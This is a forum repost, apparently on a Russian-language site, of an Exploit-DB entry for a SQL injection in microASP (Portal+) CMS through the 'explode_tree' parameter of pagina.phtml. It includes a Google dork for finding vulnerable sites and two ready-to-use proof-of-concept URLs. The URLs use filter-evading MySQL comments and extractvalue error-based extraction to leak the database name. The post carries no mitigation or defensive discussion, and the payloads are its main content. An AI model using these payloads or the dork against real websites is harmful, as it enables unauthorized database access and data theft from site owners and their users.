Exploit microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
46799
Проверка EDB
  1. Пройдено
Автор
FELIPE ANDRIAN
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
N/A
Дата публикации
2019-05-06
microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection
Код:
[+] Sql Injection on microASP (Portal+) CMS

[+] Date: 05/05/2019

[+] Risk: High

[+] CWE Number : CWE-89

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://www.microasp.it/

[+] Contact: [email protected]

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;)

[+] Exploit : 

        http://host/patch/pagina.phtml?explode_tree= [SQL Injection]

[+] PoC : 
 
   https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-
   https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
   
[+] EOF
 
Источник
www.exploit-db.com

Похожие темы